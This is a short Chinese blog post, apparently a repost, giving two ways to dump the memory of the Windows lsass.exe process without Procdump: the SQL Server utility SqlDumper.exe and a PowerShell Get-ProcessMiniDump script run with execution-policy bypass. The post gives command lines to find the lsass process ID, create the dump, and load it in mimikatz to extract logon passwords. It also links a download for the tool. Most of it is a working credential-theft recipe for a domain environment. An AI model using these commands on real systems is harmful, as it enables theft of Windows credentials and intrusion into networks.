zoukankan      html  css  js  c++  java
  • 关于代替Procdump dump lsass的两种方法

    如果目标系统上安装了sql server ,SqlDumper.exe默认存放c:ProgramFilesMicrosoft SQL Server umberShared,
    number对应sqlserver版本
    140 for SQL Server 2017
    130 for SQL Server 2016
    120 for SQL Server 2014
    110 for SQL Server 2012
    100 for SQL Server 2008
    90 for SQL Server 2005
    这里域环境为2008,故SqlDumper.exe在这个位置C:Program FilesMicrosoft SQL Server100Shared

    对比Procdump尺寸也小了许多

    具体实战:
    查看lsass.exe 的ProcessID
    tasklist /svc |findstr lsass.exe
    根据ProcessID来dump 内存文件,Full dump file执行成功后会生产SQLDmpr0001.mdmp文件
    Sqldumper.exe ProcessID 0 0x01100

    mimikatz加载dump文件
    sekurlsa::minidump SQLDmpr0001.mdmp
    sekurlsa::logonPasswords full

    地址https://mega.nz/#!9whTwbYR!1hx3IoIwNFcD9WubZcr0fYHGud0WR9QhpsS4tHsCCfw
    Powershell版procdump
    获得lsass.exe的进程ID
    tasklist /svc |findstr lsass.exe
    dump lsass.exe进程的内存文件
    powershell -exec bypass "import-module .Get-ProcessMiniDump.ps1;Get-ProcessMiniDump -ProcID 进程 -Path C:windows askslsass.dmp"

    剩下的就是mimikatz
    sekurlsa::minidump lsass.dmp
    sekurlsa::logonPasswords full

  • 相关阅读:
    LeetCode653. 两数之和 IV
    DFS
    DFS hdu 1016
    nyist 58 最小步数 BFS
    闭路电视监控系统
    闭路监控
    闭路电视
    恋爱的犀牛
    http://blog.163.com/db_teacher/blog/static/194540298201110723712407/
    2013=12=3 数据库实验七 数据控制实验(完整性部分)
  • 原文地址:https://www.cnblogs.com/Yang34/p/12454856.html
Copyright © 2011-2022 走看看